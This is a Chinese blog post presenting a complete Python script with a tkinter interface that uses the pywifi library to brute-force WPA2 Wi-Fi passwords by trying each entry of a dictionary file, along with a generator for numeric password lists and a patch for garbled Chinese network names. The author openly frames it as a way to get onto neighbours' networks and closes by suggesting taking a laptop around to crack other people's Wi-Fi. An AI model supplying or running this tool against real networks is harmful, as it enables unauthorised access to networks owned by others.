python实现wifi暴力破解

Toretto·2024-01-21 15:06·1083 次阅读

python实现wifi暴力破解

今天在微信上无意间看到一个公众号的文章,https://mp.weixin.qq.com/s/6fo1Db6BXbm_0lR9vLTfsg
写的是暴力破解wifi,突然回忆起小时候家里没网的时候,天天想着怎么连接邻居家的wifi。当时不会破解,只会使用万能钥匙,但是万能钥匙只是基于数据库共享,想要连接上一个wifi必须有人曾经连接这个热点的时候被万能钥匙记录。虽说字典破解也是很无脑,但是在7,8年前,如果能有个好的字典,爆破成功率还是非常高的。
今天试试用这个脚本弥补儿时的遗憾了😂

脚本

Copy
from tkinter import * from tkinter import ttk import pywifi from pywifi import const import time import tkinter.messagebox import itertools import os class Wifi_GUI(): def __init__(self, init_window_name): self.init_window_name = init_window_name # 密码文件路径 self.get_value = StringVar() # 设置可变内容 # 获取破解wifi账号 self.get_wifi_value = StringVar() # 获取wifi密码 self.get_wifimm_value = StringVar() # 抓取网卡接口 self.wifi = pywifi.PyWiFi() # 抓取第一个无线网卡 self.iface = self.wifi.interfaces()[0] # 测试链接断开所有链接 self.iface.disconnect() time.sleep(1) # 休眠1秒 # 测试网卡是否属于断开状态 assert self.iface.status() in \ [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] def __str__(self): # 自动会调用的函数,返回自身的网卡 return '(WIFI:%s,%s)' % (self.wifi, self.iface.name()) # 设置窗口 def set_init_window(self): self.init_window_name.title("破解WIFI") self.init_window_name.geometry('+500+200') labelframe = LabelFrame(width=400, height=300, text="配置") # 框架,以下对象都是对于labelframe中添加的 labelframe.grid(column=0, row=0, padx=10, pady=10) self.search = Button(labelframe, text="搜索可用WiFi", command=self.scans_wifi_list).grid(column=0, row=0) self.pojie = Button(labelframe, text="开始破解", command=self.readPassWord).grid(column=1, row=0) self.label = Label(labelframe, text="密码库文件路径:").grid(column=0, row=1) self.path = Entry(labelframe, width=12, textvariable=self.get_value).grid(column=1, row=1) self.file = Button(labelframe, text="生成密码库文件", command=self.creat_pwd).grid(column=2, row=1) self.wifi_text = Label(labelframe, text="WiFi名称:").grid(column=0, row=2) self.wifi_input = Entry(labelframe, width=12, textvariable=self.get_wifi_value).grid(column=1, row=2) self.wifi_mm_text = Label(labelframe, text="WiFi密码:").grid(column=2, row=2) self.wifi_mm_input = Entry(labelframe, width=10, textvariable=self.get_wifimm_value).grid(column=3, row=2,sticky=W) self.wifi_labelframe = LabelFrame(text="可用wifi列表") self.wifi_labelframe.grid(column=0, row=3, columnspan=4, sticky=NSEW) # 定义树形结构与滚动条 self.wifi_tree = ttk.Treeview(self.wifi_labelframe, show="headings", columns=("a", "b", "c", "d"),) self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview) self.wifi_tree.configure(yscrollcommand=self.vbar.set) # 表格的标题 self.wifi_tree.column("a", width=50, anchor="center") self.wifi_tree.column("b", width=100, anchor="center") self.wifi_tree.column("c", width=100, anchor="center") self.wifi_tree.column("d", width=100, anchor="center") self.wifi_tree.heading("a", text="WiFiID") self.wifi_tree.heading("b", text="SSID") self.wifi_tree.heading("c", text="BSSID") self.wifi_tree.heading("d", text="signal") self.wifi_tree.grid(row=4, column=0, sticky=NSEW) self.wifi_tree.bind("<Double-1>", self.onDBClick) self.vbar.grid(row=4, column=1, sticky=NS) self.get_value.set(os.getcwd().replace('\\', '/')+'/password.txt') # 搜索wifi def scans_wifi_list(self): # 扫描周围wifi列表 # 开始扫描 print("@@@启动扫描可用wifi...") self.iface.scan() time.sleep(15) # 在若干秒后获取扫描结果 scanres = self.iface.scan_results() for i in scanres: print(i.ssid) # 统计附近被发现的热点数量 nums = len(scanres) print("数量: %s" % (nums)) # 实际数据 self.show_scans_wifi_list(scanres) return scanres # 显示wifi列表 def show_scans_wifi_list(self, scans_res): for index, wifi_info in enumerate(scans_res): self.wifi_tree.insert("", 'end', values=(index + 1,wifi_info.ssid, wifi_info.bssid, wifi_info.signal)) def creat_pwd(self): key = '0123456789' # 密码包含这些字符//.qwertyuiopasdfghjklzxcvbnm passwords = itertools.product(key, repeat=8) f = open('password.txt', 'a') for i in passwords: f.write("".join(i)) f.write('\n') f.close() self.get_value.set(os.getcwd().replace('\\', '/') + '/password.txt') # Treeview绑定事件 def onDBClick(self, event): self.sels = event.widget.selection() self.get_wifi_value.set(self.wifi_tree.item(self.sels, "values")[1]) # 读取密码字典,进行匹配 def readPassWord(self): self.getFilePath = self.get_value.get() self.get_wifissid = self.get_wifi_value.get() pwdfilehander = open(self.getFilePath, "r", errors="ignore") while True: try: self.pwdStr = pwdfilehander.readline() if not self.pwdStr: break self.bool1 = self.connect(self.pwdStr, self.get_wifissid) if self.bool1: self.res = "密码正确!wifi名:%s,匹配密码:%s " % (self.get_wifissid, self.pwdStr) self.get_wifimm_value.set(self.pwdStr) tkinter.messagebox.showinfo('提示', '破解成功!!!') print(self.res) break else: self.res = "密码错误!wifi名:%s,匹配密码:%s" % (self.get_wifissid, self.pwdStr) print(self.res) time.sleep(3) except: continue def connect(self, pwd_Str, wifi_ssid): # 创建wifi链接文件 self.profile = pywifi.Profile() self.profile.ssid = wifi_ssid # wifi名称 self.profile.auth = const.AUTH_ALG_OPEN # 网卡的开放 self.profile.akm.append(const.AKM_TYPE_WPA2PSK) # wifi加密算法 self.profile.cipher = const.CIPHER_TYPE_CCMP # 加密单元 self.profile.key = pwd_Str # 密码 self.iface.remove_all_network_profiles() # 删除所有的wifi文件 self.tmp_profile = self.iface.add_network_profile(self.profile) # 设定新的链接文件 self.iface.connect(self.tmp_profile) # 链接 time.sleep(5) if self.iface.status() == const.IFACE_CONNECTED: # 判断是否连接上 isOK = True else: isOK = False self.iface.disconnect() # 断开 time.sleep(1) # 检查断开状态 assert self.iface.status() in \ [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE] return isOK if __name__ == "__main__": init_window = Tk() ui = Wifi_GUI(init_window) print(ui) ui.set_init_window() init_window.mainloop()

这个脚本确实不错,很简洁实用。就是利用pywifi的模块获取网卡,然后读取能够访问的wifi
之后的攻击就是对着wifi一顿输出,读取字典password.txt的密码一个一个试。

切换字典

原本脚本里是用到自动创建密码文件,内容是9位所有数字组合
image
这个字典的效率有点低,我还是选择自己收集的wifi字典了
image

解决中文乱码问题

这里的问题在原文我也看见了,就是在显示wifi名称的时候
image
可以看到一些名称是乱码,开始我尝试了编码,str类型转化但是怎么都转化不成中文。并且直接print打印也是乱码
我就想问题应该在模块里,先追随到
image
发现这里没啥问题,下面的迭代只是设置报错,只能再往前找了
定位到了
image
这里才看到端倪,

Copy
ssid = '' for j in range(networks[i].dot11Ssid.uSSIDLength): if networks[i].dot11Ssid.ucSSID != b'': ssid += "%c" % networks[i].dot11Ssid.ucSSID[j]

这段代码的主要目的是从一个名为networks的列表中提取WiFi网络的SSID,并将它们拼接成一个字符串。它特别处理了SSID的长度和每个字符,以确保能够正确地提取和拼接SSID。它的本意逐个字符处理可以确保每个字符都被正确解释和转换,从而避免潜在的编码问题。但是这里却不如直接编码转化
将原本写法注释加上

Copy
utf8_string = str(networks[i].dot11Ssid.ucSSID, 'utf-8')

image
再次执行就会发现没有乱码了
image

破解效果

image
image
以后走哪带电脑可以试试破解别人的wifi
但是这个速度我感觉还是比较慢,爆破一个都得好几分钟😢

posted @   Erebussss  阅读(1083)  评论(1编辑  收藏  举报
相关博文:
阅读排行:
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
点击右上角即可分享
微信分享提示